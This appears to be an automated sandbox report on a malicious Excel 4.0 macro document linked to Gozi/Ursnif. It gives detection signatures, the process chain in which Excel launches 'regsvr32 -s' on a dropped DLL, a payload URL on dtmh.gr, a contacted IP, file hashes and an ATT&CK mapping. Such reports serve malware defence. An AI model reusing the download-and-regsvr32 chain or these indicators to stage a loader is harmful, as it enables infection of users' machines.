Loading ...

Play interactive tourEdit tour

Analysis Report document-1411290183.xls

Overview

General Information

Sample Name:document-1411290183.xls
Analysis ID:324295
MD5:32a11b7a08798a31c2ecce5ff34de4da
SHA1:316cbd65065f682a134182f72517251b28daee3b
SHA256:25cfb8623367e8f73139b0163de1750283af61ec4d78e0c0c9d6bb0a8bbc6651
Tags:goziSilentBuilderursnifxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1288 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2364 cmdline: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-1411290183.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x502a2:$s1: Excel
  • 0x5131d:$s1: Excel
  • 0x389b:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1411290183.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1288, ProcessCommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, ProcessId: 2364

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: document-1411290183.xlsVirustotal: Detection: 34%Perma Link

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exeJump to behavior
    Source: global trafficDNS query: name: dtmh.gr
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 78.46.235.88:443
    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 78.46.235.88:443
    Source: Joe Sandbox ViewIP Address: 78.46.235.88 78.46.235.88
    Source: unknownDNS traffic detected: queries for: dtmh.gr
    Source: regsvr32.exe, 00000003.00000002.2138187955.0000000001DC0000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
    Source: document-1411290183.xlsString found in binary or memory: https://dtmh.gr/ds/231120.gif
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49167
    Source: unknownNetwork traffic detected: HTTP traffic on port 49167 -> 443

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable Content X I Al " "," jR " A B C D E F G H I J K L M N O P Q R S T : 1 2 3 4 5 6 7
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-1411290183.xlsInitial sample: CALL
    Source: document-1411290183.xlsInitial sample: CALL
    Source: document-1411290183.xlsInitial sample: CALL
    Source: document-1411290183.xlsInitial sample: CALL
    Source: document-1411290183.xlsInitial sample: EXEC
    Found obfuscated Excel 4.0 MacroShow sources
    Source: document-1411290183.xlsInitial sample: High usage of CHAR() function: 18
    Source: document-1411290183.xlsOLE indicator, VBA macros: true
    Source: document-1411290183.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal80.expl.evad.winXLS@3/5@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\00EE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD73B.tmpJump to behavior
    Source: document-1411290183.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: document-1411290183.xlsVirustotal: Detection: 34%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-1411290183.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Regsvr321OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-1411290183.xls34%VirustotalBrowse
    document-1411290183.xls11%MetadefenderBrowse
    document-1411290183.xls4%ReversingLabsDocument-Word.Trojan.Heuristic

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    dtmh.gr1%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://dtmh.gr/ds/231120.gif0%URL Reputationsafe
    https://dtmh.gr/ds/231120.gif0%URL Reputationsafe
    https://dtmh.gr/ds/231120.gif0%URL Reputationsafe
    https://dtmh.gr/ds/231120.gif0%URL Reputationsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    dtmh.gr
    78.46.235.88
    truefalseunknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://dtmh.gr/ds/231120.gifdocument-1411290183.xlsfalse
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    • URL Reputation: safe
    unknown
    http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2138187955.0000000001DC0000.00000002.00000001.sdmpfalse
    • Avira URL Cloud: safe
    low

    Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public

    IPDomainCountryFlagASNASN NameMalicious
    78.46.235.88
    unknownGermany
    24940HETZNER-ASDEfalse

    General Information

    Joe Sandbox Version:31.0.0 Red Diamond
    Analysis ID:324295
    Start date:29.11.2020
    Start time:03:58:55
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 4m 46s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:document-1411290183.xls
    Cookbook file name:defaultwindowsofficecookbook.jbs
    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of analysed new started processes analysed:6
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal80.expl.evad.winXLS@3/5@1/1
    EGA Information:Failed
    HDC Information:Failed
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 0
    • Number of non-executed functions: 0
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI
    • Found application associated with file extension: .xls
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Scroll down
    • Close Viewer
    Warnings:
    Show All
    • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe

    Simulations

    Behavior and APIs

    No simulations

    Joe Sandbox View / Context

    IPs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    78.46.235.88document-1393356833.xlsGet hashmaliciousBrowse
      document-1449702565.xlsGet hashmaliciousBrowse
        document-1457177111.xlsGet hashmaliciousBrowse
          document-1449702565.xlsGet hashmaliciousBrowse
            document-146786230.xlsGet hashmaliciousBrowse
              document-1457177111.xlsGet hashmaliciousBrowse
                document-146786230.xlsGet hashmaliciousBrowse
                  document-1442977347.xlsGet hashmaliciousBrowse
                    document-1442977347.xlsGet hashmaliciousBrowse
                      document-1465459998.xlsGet hashmaliciousBrowse
                        document-1444203221.xlsGet hashmaliciousBrowse
                          document-1444203221.xlsGet hashmaliciousBrowse
                            document-1466544307.xlsGet hashmaliciousBrowse
                              document-1466544307.xlsGet hashmaliciousBrowse
                                document-1456597551.xlsGet hashmaliciousBrowse
                                  document-1456597551.xlsGet hashmaliciousBrowse
                                    document-1460706074.xlsGet hashmaliciousBrowse
                                      document-1460706074.xlsGet hashmaliciousBrowse
                                        document-1475334804.xlsGet hashmaliciousBrowse
                                          document-1475334804.xlsGet hashmaliciousBrowse

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            dtmh.grdocument-1393356833.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1449702565.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1457177111.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1449702565.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-146786230.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1457177111.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-146786230.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1442977347.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1442977347.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1465459998.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1444203221.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1444203221.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1466544307.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1466544307.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1456597551.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1456597551.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1460706074.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1460706074.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1475334804.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1475334804.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88

                                            ASN

                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                            HETZNER-ASDEdocument-1393356833.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1449702565.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1457177111.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1449702565.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-146786230.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1457177111.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-146786230.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1442977347.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1442977347.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1465459998.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1444203221.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1444203221.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1466544307.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1466544307.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            https://ofd.beeline.ru/check-order/oxjsoinmqGet hashmaliciousBrowse
                                            • 88.99.149.88
                                            document-1456597551.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1456597551.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1460706074.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            document-1460706074.xlsGet hashmaliciousBrowse
                                            • 78.46.235.88
                                            KeJ7Cl7flZ.exeGet hashmaliciousBrowse
                                            • 88.99.66.31

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Temp\5EDE0000
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):315624
                                            Entropy (8bit):7.9855628832242145
                                            Encrypted:false
                                            SSDEEP:6144:6qSrFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+Mu:6BFPM8R3AsB+bjej/9cv
                                            MD5:6AEC35496D8B7375CD8DD3E6AFFB2D2C
                                            SHA1:28DD778059D5A6FFE98A5E04FE0B46359EEC9838
                                            SHA-256:4E923B3014EAF83E222594516D6B4C7E1050CD8327D026021FE7D9208D699512
                                            SHA-512:C3593B21286CD0BC70B26934F21F33622B55A38E2F617E16FD04383462919533653214DA61C9CAE4A171F971A167CDE31C8D6D744506ED3A83AD2CFA651163EF
                                            Malicious:false
                                            Reputation:low
                                            Preview: .V.N.0..4..y;J\@B.QS....A.>..o..~.6..=.nH..4DTb..s......j.U..>HkjrV.H..[!MS...?.OR..`.......Z|.6..:...M.I...Ei.-h.*.....z."...:...z>.]RnM...8.b..V.Q..f..wN...z.^...sNI."..OF.DJ.ZI...G..Up...-@.r^.......@.AMg.....sz~..A..d.f.C..\Jh..?0.w....9t..8.^.(n......F.g..Kk..q....%l8.*'Vi..1l...4...(ed..t........K.d.....T#}.{.Lo.+........"...&.2=..2.=../.^*..,#..q3...._.fD0..p.9..).....M6'7.{...9Y....s.Ft9S...}........g.z...E....v..........rh....YM..tZHM[.8.M.O.........PK..........!.C.T.....e.......[Content_Types].xml ...(..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sun Nov 29 10:59:42 2020, atime=Sun Nov 29 10:59:42 2020, length=8192, window=hide
                                            Category:dropped
                                            Size (bytes):867
                                            Entropy (8bit):4.462474117952377
                                            Encrypted:false
                                            SSDEEP:12:85QiiMCLgXg/XAlCPCHaXgzB8IB/DOX+WnicvbgXgbDtZ3YilMMEpxRljKB3TdJU:851iMU/XTwz6IkYe8kDv3q0rNru/
                                            MD5:123701E8F9A1D972F1BC1762462637F9
                                            SHA1:991CF691DC15CB257677252E22EACE452DA2BA73
                                            SHA-256:4820C8952BF30242EC5F190C64CA723D100FCA844549E77ABEAE26DAE1BE4B53
                                            SHA-512:5095F8832CACD50D074D051609AB928BA5B76E97D6C91CF3FB8BC52EA6C5AF07A1738ABC6BBE2913C51492504FDC4481DA5BFCC557C6CD822FD9CB1C95023E4A
                                            Malicious:false
                                            Reputation:low
                                            Preview: L..................F...........7G...Li.G....Li.G.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....}Qv_..Desktop.d......QK.X}Qv_*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\632922\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......632922..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1411290183.LNK
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Sun Nov 29 10:59:42 2020, atime=Sun Nov 29 10:59:42 2020, length=339968, window=hide
                                            Category:dropped
                                            Size (bytes):4236
                                            Entropy (8bit):4.509541175005866
                                            Encrypted:false
                                            SSDEEP:96:8c/XLIkedF0Qh2c/XLIkedF0Qh2c/XLIkedF0Qh2c/XLIkedF0Q/:82IkedOQE2IkedOQE2IkedOQE2IkedOg
                                            MD5:14E0FCBEE54E6AF68B114718F0DAD631
                                            SHA1:A13BA7A5E74A3CA5BFBB531C1BA6427148256BA6
                                            SHA-256:F70532A4C6ECA47E46866AB7BD1B1D299A5C25085DA413447BE056D11802CCFC
                                            SHA-512:AD509BFABAED88EBA362772E3619CDE8764E85BE5B53DF1D45E4B9609A6723D0A331A9717C470868848CEB6C9A1CB7DF36A641DB42F3051579CEC35CE80219B7
                                            Malicious:false
                                            Reputation:low
                                            Preview: L..................F.... ....H...{...Li.G.....r.G....0...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2..0..}Qs_ .DOCUME~1.XLS..\.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.1.4.1.1.2.9.0.1.8.3...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\632922\Users.user\Desktop\document-1411290183.xls.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.4.1.1.2.9.0.1.8.3...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......632922..........D_....3N.
                                            C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:modified
                                            Size (bytes):232
                                            Entropy (8bit):4.707013899257223
                                            Encrypted:false
                                            SSDEEP:6:dj6Y9LCCELCKY9LCCELCKY9LCCELCKY9LCC:dmttt0
                                            MD5:A0CB30A30AEEFC7C978D63BE605EEA5B
                                            SHA1:97E7E415E40F92C6422A2C50688C07100F8F8AC3
                                            SHA-256:8B27F20DC92EFF0CAF7687295D067F79B69F1779FD3FAAF34FA6D8E6F09DDC31
                                            SHA-512:35BA55B73AE11177988B888A3B5F9360B1B36B49FCB4F8CA75DB530B7D90C057F074896F85CC704D422758E7E7DF1DE774DA3B3166105FFF4AE854B4EC9D5889
                                            Malicious:false
                                            Reputation:low
                                            Preview: Desktop.LNK=0..[xls]..document-1411290183.LNK=0..document-1411290183.LNK=0..[xls]..document-1411290183.LNK=0..document-1411290183.LNK=0..[xls]..document-1411290183.LNK=0..document-1411290183.LNK=0..[xls]..document-1411290183.LNK=0..
                                            C:\Users\user\Desktop\00EE0000
                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            File Type:Applesoft BASIC program data, first line number 16
                                            Category:dropped
                                            Size (bytes):401065
                                            Entropy (8bit):7.183152593297539
                                            Encrypted:false
                                            SSDEEP:6144:KcKoSsxzNDZLDZjlbR868O8KiA4XkXOn2xEtjPOtioVjDGUU1qfDlavx+W+LIfd2:cizo8RnsIROnr6n75YZ4
                                            MD5:D8571130AD827163030EDB7519E60882
                                            SHA1:9E6DD62BB060DCF12FB0BB5D08160E7448D6BCBB
                                            SHA-256:2366622AAA9176C7AE8A2648524AC61D7213809A81C2B3B745D2D617ED326E0A
                                            SHA-512:7641870FE9138F89C8CB739D4656F25F02E8524516F73A7A8C202709E04594CC7BEC54F0048BFD2FD9D091CDDF2E18F840728D4EB542606D825F8C192E21D522
                                            Malicious:false
                                            Preview: ........g2.........................\.p.... B.....a.........=..........................................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1

                                            Static File Info

                                            General

                                            File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Nov 26 09:47:56 2020, Security: 0
                                            Entropy (8bit):7.519789176158722
                                            TrID:
                                            • Microsoft Excel sheet (30009/1) 78.94%
                                            • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                            File name:document-1411290183.xls
                                            File size:339968
                                            MD5:32a11b7a08798a31c2ecce5ff34de4da
                                            SHA1:316cbd65065f682a134182f72517251b28daee3b
                                            SHA256:25cfb8623367e8f73139b0163de1750283af61ec4d78e0c0c9d6bb0a8bbc6651
